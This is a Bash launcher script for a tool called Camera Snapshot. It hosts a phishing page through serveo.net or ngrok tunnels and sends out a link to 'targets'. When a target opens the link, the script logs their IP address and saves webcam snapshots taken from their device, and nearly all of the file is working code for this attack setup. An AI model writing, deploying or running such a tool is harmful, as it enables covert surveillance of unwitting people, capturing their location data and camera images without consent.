#!/bin/bash

#            --------------------------------------------------
#                              Camera Snapshot                
#            --------------------------------------------------
#                  Copyright (C) <2019>  <Entynetproject>
#
#        This program is free software: you can redistribute it and/or modify
#        it under the terms of the GNU General Public License as published by
#        the Free Software Foundation, either version 3 of the License, or
#        any later version.
#
#        This program is distributed in the hope that it will be useful,
#        but WITHOUT ANY WARRANTY; without even the implied warranty of
#        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#        GNU General Public License for more details.
#
#        You should have received a copy of the GNU General Public License
#        along with this program.  If not, see <http://www.gnu.org/licenses/>.

printf '\033]2;Camera Snapshot\a'

if [[ "$1" = "-u" || "$1" = "--update" ]]
then
chmod +x bin/camsnap
bin/camsnap -u
exit
fi

trap 'printf "\n";stop' 2
clear

if [[ -d images ]]
then
sleep 0
else
mkdir images
fi

banner() {

printf "\033[1;92m   ____               \033[0m\033[1;77m ____                    \033[0m\n"
printf "\033[1;92m  / ___|__ _ _ __ ___ \033[0m\033[1;77m/ ___| _ __   __ _ _ __  \033[0m\n"
printf "\033[1;92m | |   / _\` | '_ \` _ \\\\\033[0m\033[1;77m\___ \| '_ \ / _\` | '_ \ \033[0m\n"
printf "\033[1;92m | |__| (_| | | | | | |\033[0m\033[1;77m___) | | | | (_| | |_) |\033[0m\n"
printf "\033[1;92m  \____\__,_|_| |_| |_|\033[0m\033[1;77m____/|_| |_|\__,_| .__/ \033[0m\n"
printf "\033[1;92m                       \033[0m\033[1;77m                 |_|    \033[0m\n"

}

stop() {

checkngrok=$(ps aux | grep -o "ngrok" | head -n1)
checkphp=$(ps aux | grep -o "php" | head -n1)
checkssh=$(ps aux | grep -o "ssh" | head -n1)
if [[ $checkngrok == *'ngrok'* ]]; then
pkill -f -2 ngrok > /dev/null 2>&1
killall -2 ngrok > /dev/null 2>&1
fi

if [[ $checkphp == *'php'* ]]; then
killall -2 php > /dev/null 2>&1
fi
if [[ $checkssh == *'ssh'* ]]; then
killall -2 ssh > /dev/null 2>&1
fi
exit 1

}

dependencies() {


command -v php > /dev/null 2>&1 || { echo -e "\n\033[1;31m[\033[0m-\033[1;31m] Error, php is not installed!\033[0m"; exit; }
 


}

catch_ip() {

ip=$(grep -a 'IP:' ip.txt | cut -d " " -f2 | tr -d '\r')
IFS=$'\n'
printf "\033[1;92m[\033[0m+\033[1;92m] IP:\033[0m\033[1;77m %s\033[0m\n" $ip

cat ip.txt >> saved.ip.txt


}

checkfound() {

printf "\033[1;77m[\033[0m\033[1;93m*\033[0m\033[1;77m] Waiting for targets...\033[0m\n"
while [ true ]; do


if [[ -e "ip.txt" ]]; then
printf "\033[1;92m[\033[0m+\033[1;92m] Target opened the link!\n"
catch_ip
rm -rf ip.txt

fi

sleep 0.5

if [[ -e ".log.log" ]]; then
{
mv .*.png images/img"$RANDOM".png
} &> /dev/null
printf "\033[1;77m[\033[0m\033[1;93m*\033[0m\033[1;77m] Getting camera snapshot...\033[0m\n"
sleep 0.5
printf "\033[1;92m[\033[0m+\033[1;92m] Camera snapshot received!\033[0m\n"
rm -rf .log.log
fi
sleep 0.5

done 

}


server() {

command -v ssh > /dev/null 2>&1 || { echo -e "\033[1;31m[\033[0m-\033[1;31m] Error, ssh is not installed!\033[0m"; exit; }

printf "\033[1;77m[\033[0m\033[1;93m*\033[0m\033[1;77m] Starting php server...\033[0m\n"

if [[ $checkphp == *'php'* ]]; then
killall -2 php > /dev/null 2>&1
fi

if [[ $subdomain_resp == true ]]; then

$(which sh) -c 'ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R '$subdomain':80:localhost:3333 serveo.net  2> /dev/null > sendlink ' &

sleep 8
else
$(which sh) -c 'ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:3333 serveo.net 2> /dev/null > sendlink ' &

sleep 8
fi
printf "\033[1;77m[\033[0m\033[1;93m*\033[0m\033[1;77m] Starting Serveo...\033[0m\n"
fuser -k 3333/tcp > /dev/null 2>&1
php -S localhost:3333 > /dev/null 2>&1 &
sleep 3
send_link=$(grep -o "https://[0-9a-z]*\.serveo.net" sendlink)
printf '\033[1;93m[\033[0m\033[1;77m+\033[0m\033[1;93m] Direct link:\033[0m\033[1;77m %s \n' $send_link

}


payload_ngrok() {

link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
sed 's+forwarding_link+'$link'+g' camsnap.html > index2.html
sed 's+forwarding_link+'$link'+g' template.php > index.php


}

ngrok_server() {


if [[ -e ngrok ]]; then
echo ""
else
command -v unzip > /dev/null 2>&1 || { echo -e "\033[1;31m[\033[0m-\033[1;31m] Error, unzip is not installed!\033[0m"; exit; }
command -v wget > /dev/null 2>&1 || { echo -e "\033[1;31m[\033[0m-\033[1;31m] Error, wget is not installed!\033[0m"; exit; }
printf "\033[1;92m[\033[0m+\033[1;92m] Downloading Ngrok...\n"
arch=$(uname -a | grep -o 'arm' | head -n1)
arch2=$(uname -a | grep -o 'Android' | head -n1)
if [[ $arch == *'arm'* ]] || [[ $arch2 == *'Android'* ]] ; then
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip > /dev/null 2>&1

if [[ -e ngrok-stable-linux-arm.zip ]]; then
unzip ngrok-stable-linux-arm.zip > /dev/null 2>&1
chmod +x ngrok
rm -rf ngrok-stable-linux-arm.zip
else
printf "\033[1;31m[\033[0m-\033[1;31m] Download failed!\033[0m\n"
exit
fi

else
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > /dev/null 2>&1 
if [[ -e ngrok-stable-linux-386.zip ]]; then
unzip ngrok-stable-linux-386.zip > /dev/null 2>&1
chmod +x ngrok
rm -rf ngrok-stable-linux-386.zip
else
printf "\033[1;31m[\033[0m-\033[1;31m] Download failed!\033[0m\n"
exit
fi
fi
fi

printf "\033[1;92m[\033[0m+\033[1;92m] Starting php server...\n"
php -S 127.0.0.1:3333 > /dev/null 2>&1 & 
sleep 2
printf "\033[1;92m[\033[0m+\033[1;92m] Starting Ngrok...\n"
./ngrok http 3333 > /dev/null 2>&1 &
sleep 10

link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\033[1;92m[\033[0m+\033[1;92m] Direct link:\033[0m\033[1;77m %s\033[0m\n" $link

payload_ngrok
checkfound
}

start1() {
if [[ -e sendlink ]]; then
rm -rf sendlink
fi
printf "\033[1;92m[\033[0m\033[1;77m1\033[0m\033[1;92m]\033[0m\033[1;93m Serveo\033[0m\n"
printf "\033[1;92m[\033[0m\033[1;77m2\033[0m\033[1;92m]\033[0m\033[1;93m Ngrok\033[0m\n"
default_option_server="1"
read -e -p $'\n\033[1;92m[\033[0m\033[1;77m>\033[0m\033[1;92m] Choose portfwd service: \033[0m' option_server
option_server="${option_server:-${default_option_server}}"
if [[ $option_server -eq 1 ]]; then

command -v php > /dev/null 2>&1 || { echo -e "\033[1;31m[\033[0m-\033[1;31m] Error, php is not installed!\033[0m"; exit; }
start

elif [[ $option_server -eq 2 ]]; then
ngrok_server
else
clear
banner
dependencies
start1
fi

}


payload() {

send_link=$(grep -o "https://[0-9a-z]*\.serveo.net" sendlink)

sed 's+forwarding_link+'$send_link'+g' camsnap.html > index2.html
sed 's+forwarding_link+'$send_link'+g' template.php > index.php


}

start() {

default_choose_sub="Y"
default_subdomain="camsnap$RANDOM"

read -e -p $'\033[1;33m[\033[0m\033[1;77m?\033[0m\033[1;33m] Choose subdomain? (Default:\033[0m\033[1;77m [Y/n]\033[0m\033[1;33m): \033[0m' choose_sub
choose_sub="${choose_sub:-${default_choose_sub}}"
if [[ $choose_sub == "Y" || $choose_sub == "y" || $choose_sub == "Yes" || $choose_sub == "yes" ]]; then
subdomain_resp=true
printf '\033[1;92m[\033[0m\033[1;77m>\033[0m\033[1;92m] Subdomain: (Default:\033[0m\033[1;77m %s\033[0m\033[1;92m): \033[0m' $default_subdomain
read -e subdomain
if [[ $subdomain = "" ]]
then
printf '\n'
fi
subdomain="${subdomain:-${default_subdomain}}"
fi

server
payload
checkfound

}

banner
dependencies
start1
